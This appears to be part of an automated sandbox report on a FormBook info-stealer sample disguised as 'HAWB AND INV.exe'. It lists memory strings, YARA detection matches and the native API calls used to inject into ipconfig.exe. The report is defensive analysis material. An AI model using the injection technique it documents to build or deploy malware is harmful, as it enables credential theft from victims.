          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: powershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: HAWB AND INV.exeString found in binary or memory: https://github.com/unguest
          Source: HAWB AND INV.exeString found in binary or memory: https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty
          Source: ipconfig.exe, 00000017.00000002.598011304.0000000003162000.00000004.00000001.sdmpString found in binary or memory: https://go.cpanel.net/privacy
          Source: powershell.exe, 00000004.00000003.477109333.0000000005AE1000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000002.00000003.453197763.0000000005250000.00000004.00000001.sdmpString found in binary or memory: https://go.microX%
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.593621716.0000000000850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_004181AA NtCreateFile,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041825A NtReadFile,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012198F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012195D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012197A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012199D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0121B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012198A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0121A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219A10 NtQuerySection,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0121AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219560 NtWriteFile,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012195F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0121A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219760 NtOpenProcess,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0121A770 NtOpenThread,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012196D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B196D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B195D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B1A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B198A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B198F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B1B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B199D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B197A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B1A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B1A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B195F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B1AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19560 NtWriteFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_001281B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_00128260 NtReadFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_001282E0 NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_001281AA NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012825A NtReadFile,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_012AC3A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_012AA758
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_012AF838
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_058320B0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_058320C0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_05831038
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_05831D98
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_05831DF0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_05830FF4
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_05833F41
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_05833F50
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_05831911
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_05831920
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_05836A18
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_02E8E750
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041C84F
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00401026
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00401030
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041C1F0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00408C50
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041BC3A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041CD1A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041C5F3
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041B584
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00402D88
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00402D90
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041CE7B
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041BE26
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041C7D9
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00402FB0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DF900
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F4120
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291002
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A20A8
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EB090
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A28EC
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A2B28
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120EBB0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129DBD2
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A22AE
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A2D07
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D0D20
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A1D55
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202581
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A25DD
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011ED5E0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E841F
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129D466
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A1FF1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F6E30
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129D616
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A2EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA22AE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0EBB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA2B28
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B020A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA20A8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AEB090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA28EC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BAE824
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91002
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADF900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA2EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF6E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9D616
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA1FF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE841F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9D466
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B02581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AED5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA25DD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD0D20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA2D07
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA1D55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012C84F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012BC3A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_00118C50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_00112D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012B584
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_00112D88
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012C5F3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_00112FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012C7D9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 02ADB150 appears 35 times
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: String function: 011DB150 appears 35 times
          Source: HAWB AND INV.exeBinary or memory string: OriginalFilename vs HAWB AND INV.exe
          Source: HAWB AND INV.exe, 00000000.00000002.364582224.000000000BE40000.00000002.00000001.sdmpBinary or memory string: originalfilename vs HAWB AND INV.exe
          Source: HAWB AND INV.exe, 00000000.00000002.364582224.000000000BE40000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs HAWB AND INV.exe
          Source: HAWB AND INV.exe, 00000000.00000002.363402350.00000000060D0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs HAWB AND INV.exe
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll( vs HAWB AND INV.exe
          Source: HAWB AND INV.exe, 00000000.00000002.363989831.000000000BD40000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs HAWB AND INV.exe
          Source: HAWB AND INV.exeBinary or memory string: OriginalFilename vs HAWB AND INV.exe
          Source: HAWB AND INV.exe, 0000000A.00000002.485481654.0000000003107000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs HAWB AND INV.exe
          Source: HAWB AND INV.exe, 0000000A.00000002.479054770.00000000012CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HAWB AND INV.exe
          Source: HAWB AND INV.exeBinary or memory string: OriginalFilenameTOKENPRIMARYGROUP.exe6 vs HAWB AND INV.exe
          Source: HAWB AND INV.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
